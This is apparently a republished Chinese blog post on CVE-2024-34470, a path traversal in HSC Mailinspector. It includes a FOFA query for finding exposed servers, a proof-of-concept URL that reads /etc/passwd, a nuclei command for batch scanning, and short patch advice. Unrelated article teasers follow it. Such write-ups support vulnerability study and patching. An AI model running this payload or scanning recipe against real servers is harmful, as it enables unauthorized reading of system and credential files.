#滲透測試#批量漏洞挖掘#HSC Mailinspector 任意文件讀取漏洞(CVE-2024-34470)

免責聲明 本教程僅為合法的教學目的而準備,嚴禁用于任何形式的違法犯罪活動及其他商業行為,在使用本教程前,您應確保該行為符合當地的法律法規,繼續閱讀即表示您需自行承擔所有操作的后果,如有異議,請立即停止本文章讀。

目錄

HSC Mailinspector 任意文件讀取漏洞(CVE-2024-34470)

0x01漏洞概述

0x02漏洞復現

0x03漏洞分析

0x04修復建議

HSC Mailinspector 任意文件讀取漏洞(CVE-2024-34470)

0x01漏洞概述

HSC Mailinspector 是一種郵件安全解決方案,旨在保護企業和組織免受各種電子郵件威脅的影響。它提供了一系列功能,包括針對垃圾郵件、惡意軟件、垃圾郵件和其他網絡威脅的過濾和檢測。

在 HSC Mailinspector 的 5.2.17-3 版本到 5.2.18 版本之間發現了一個問題。在 /public/loader.php 文件中存在一個未經身份驗證的路徑遍歷漏洞。path參數沒有正確過濾傳遞的文件和目錄是否屬于 Web 根目錄,這使得攻擊者能夠讀取服務器上的任意文件。

受影響版本

HSC Mailinspector : 5.2.17-3<=version<=5.2.18受影響。

CVE編號

CVE-2024-34470

0x02漏洞復現

fofa

body="mailinspector/public"

1.poc

https://target-IP/mailinspector/public/loader.php?path=../../../../../../../etc/passwd

構造如上payload,將target-IP替換成目的IP,在瀏覽器或burp中打開,即可查看目標系統的文件。

2.批量檢測poc

使用nuclei,下載地址:

https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-34470.yaml

使用命令,nuclei.exe -t CVE-2024-34470.yaml -l 1.txt

圖片

0x03漏洞分析

這個漏洞的成因是在/public/loader.php文件中存在path參數沒有正確過濾傳遞的文件和目錄是否屬于網絡根目錄,從而允許攻擊者讀取服務器上的任意文件。

0x04修復建議

1.目前廠商已發布升級補丁以修復漏洞,補丁獲取鏈接:

https://hsclabs.com/mailinspector/

2.限制用戶權限,避免授予過高的權限。

3.實施嚴格的訪問控制和身份驗證機制,以防止未經授權的訪問

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/bicheng/88173.shtml
繁體地址,請注明出處:http://hk.pswp.cn/bicheng/88173.shtml
英文地址,請注明出處:http://en.pswp.cn/bicheng/88173.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

深入解析C++驅動開發實戰:優化高效穩定的驅動應用

深入解析C驅動開發實戰&#xff1a;優化高效穩定的驅動應用 在現代計算機系統中&#xff0c;驅動程序&#xff08;Driver&#xff09;扮演著至關重要的角色&#xff0c;作為操作系統與硬件設備之間的橋梁&#xff0c;驅動程序負責管理和控制硬件資源&#xff0c;確保系統的穩定…

SNIProxy 輕量級匿名CDN代理架構與實現

&#x1f310; SNIProxy 輕量級匿名CDN代理架構與實現 &#x1f3d7;? 1. 整體架構設計 &#x1f539; 1.1 系統架構概覽 #mermaid-svg-S4n74I2nPLGityDB {font-family:"trebuchet ms",verdana,arial,sans-serif;font-size:16px;fill:#333;}#mermaid-svg-S4n74I2nP…

Qt的信號與槽(一)

Qt的信號與槽&#xff08;一&#xff09;1.信號和槽的基本認識2.connect3.關閉窗口的按鈕4.函數的根源5.形參和實參的類型&#x1f31f;hello&#xff0c;各位讀者大大們你們好呀&#x1f31f;&#x1f31f; &#x1f680;&#x1f680;系列專欄&#xff1a;【Qt的學習】 &…

springMVC02-視圖解析器、RESTful設計風格,靜態資源訪問配置

一、SpringMVC 的視圖在 SpringMVC 中&#xff0c;視圖的作用渲染數據&#xff0c;將模型 Model (將控制器&#xff08;Controller&#xff09;)中的數據展示給用戶。在 Java 代碼中&#xff0c;視圖由接口 org.springframework.web.servlet.View 表示SpringMVC 視圖的種類很多…

Go中使用Google Authenticator

現在為了安全Google二次驗證使用越來越平凡了&#xff0c;所以我們自己做的一些產品中&#xff0c;也會用到Google Authenticator。 介紹 Google Authenticator采用的算法是TOTP&#xff08;Time-Based One-Time Password基于時間的一次性密碼&#xff09;&#xff0c;其核心內…

ReactNative【實戰系列教程】我的小紅書 4 -- 首頁(含頂欄tab切換,橫向滾動頻道,頻道編輯彈窗,瀑布流布局列表等)

最終效果 頂欄 modules/index/components/topBar.tsx import icon_daily from "/assets/images/icon_daily.png"; import MaterialIcons from "expo/vector-icons/MaterialIcons"; import { useCallback, useState } from "react"; import { Im…

告別Root風險:四步構建安全高效的服務器管理體系

當整個開發團隊都使用root賬號操作服務器&#xff0c;且重要數據無備份時&#xff0c;系統如同行走在懸崖邊緣。本文將分享一套經過驗證的四步解決方案&#xff0c;幫助團隊快速提升主機安全性。 為什么必須告別Root賬號&#xff1f; 直接使用root賬號的風險&#xff1a; &am…

【IM項目筆記】1、WebSocket協議和服務端推送Web方案

這里寫自定義目錄標題 1、HTTP和WebSocket協議2、WebSocket3、Http VS WebSocket4、WebSocket - 建立連接5、服務端推送Web方案(1) 短輪詢(2) 長輪詢(3) WebSocket長連接1、HTTP和WebSocket協議 ?? HTTP請求的特點:通信只能由客戶端發起。所以,早期很多網站為了實現推送技…

【深度學習新浪潮】什么是上下文長度?

大型語言模型(LLM)的上下文長度是指模型在處理當前輸入時能夠有效利用的歷史文本長度,通常以token(如單詞、子詞或標點)為單位衡量。例如,GPT-4支持128K token的上下文,而Llama 4 Scout甚至達到了10M token的驚人規模。這一指標直接影響模型在長文檔理解、多輪對話等復雜…

Modbus TCP轉Profibus網關輕松讓流量計與DCS通訊

Modbus TCP轉Profibus網關輕松讓流量計與DCS通訊工業自動化系統中&#xff0c;協議差異常成為設備互聯的“語言障礙”。例如&#xff0c;當流量計采用Modbus TCP協議&#xff0c;而DCS系統僅支持Profibus DP時&#xff0c;如何實現無縫通信&#xff1f;本文將結合技術原理與真實…

云時代下的IT資產管理自動化實踐

前言伴隨著企業數字化轉型進程的加快&#xff0c;IT資產規模日益龐大且復雜。傳統的手工IT資產登記、跟蹤與管理方式&#xff0c;效率低下且容易出錯&#xff0c;已經無法滿足現代企業對于敏捷化、可視化和自動化運維的需求。云計算、容器化、微服務架構的普及又進一步加快了資…

Windows主機遠程桌面連接Ubuntu24.04主機

最近剛剛換了臺新電腦&#xff0c;想著空出老電腦直接裝一個Ubuntu系統給新電腦遠程連接過去進行開發&#xff0c;就可以完美避開雙系統老是要重啟切換的問題。仔細一查發現Ubuntu24.04自帶了RDP遠程工具&#xff0c;大喜&#xff01;于是探究了一番。 本篇文章將介紹本人探究…

Android WebView 性能優化指南

Android WebView 性能優化指南 WebView優化需要從多個維度綜合考慮&#xff1a;優化維度關鍵措施預期收益初始化延遲加載、實例復用降低內存峰值渲染硬件加速、合理布局提升流暢度20%內存獨立進程、泄漏防護減少OOM風險網絡緩存策略、資源攔截節省流量30%安全漏洞修復、接口限制…

Linux下SPHinXsys源碼編譯安裝及使用

目錄 軟件介紹 基本依賴 一、源碼下載 二、安裝依賴庫 1、BLAS 2、LAPACK 3、oneTBB 4、googletest 5、Boost 6、Simbody 7、pybind11 8、Eigen3 三、解壓縮 四、編譯安裝 軟件介紹 SPHinXsys是胡湘渝博士團隊采用C/C開發的一個開源無網格、多分辨率、多物理場、…

Linux中的靜態庫和動態庫

首先 我們要明白什么是庫? 庫&#xff08;Library&#xff09;是一組預編譯的代碼&#xff0c;提供特定的功能&#xff0c;可以被多個程序共享調用&#xff0c;避免重復編寫代碼。在鏈接步驟中&#xff0c;鏈接器將從庫文件取得所需的代碼&#xff0c;復制到生成的可執行文件中…

Vue3-組件化-Vue核心思想之一

一.組件及組件化1.組件化的作用由于之前的代碼全寫在一個App.vue這個文件里面&#xff0c;會到導致一個文件代碼過于多而且不易復用&#xff0c;所以有組件化的思想。2.組件的使用①創建創建一個.vue文件&#xff0c;使用setup的簡寫方式會自動導出.vue文件②導入import 組件對…

OS學習筆記

《幾個基本知識點》 一、2的冪 1024210 51229 25628 12827 6426 3225 1624 823 422 221 K210 G220 M230 T240 P250 E260 Z270 Y280 R290 Q2100 二、常用的ASCII碼 ‘1’0x31 ‘A’0x41 ‘a’0x61 空格0x20 換行0x0A 回車0x0D 三、存儲器層次中的典型速度 CPU/寄存器&#xff1a…

嵌入式學習筆記-MCU階段-DAY01

恭喜大家完成了C語言的學習&#xff0c;現在咱們來到咱們的硬件MCU階段&#xff0c;咱們這里的工程用的是keil&#xff0c;環境搭建不再贅述&#xff0c;希望大家在這一階段仍然學的愉快 1.資料部分 用的最多的就是STM32f103的手冊&#xff0c;搭配STM32F103ZET6的開發板 2.概…

three案例 Three.js波紋效果演示

波紋效果&#xff0c;在智慧城市可視化開發中經常用到&#xff0c;這里分享一個比較好玩的案例 以下是詳細的步驟&#xff1a; 初始化部分&#xff1a;設置 Three.js 環境&#xff0c;包括場景、相機、渲染器和控制器 幾何體和紋理&#xff1a;創建平面幾何體并加載波紋紋理 著…

Flutter-詳解布局

上一章我們詳細的學習了 Flutter 中的Widget&#xff0c;這一章我們將要學習 Flutter 的布局&#xff0c; 在上一章我們了解到了&#xff1a;Everything is a widget&#xff0c;在 Flutter 中幾乎所有的對象都是一個 Widget &#xff0c;當然也包括布局&#xff0c;Flutter 的…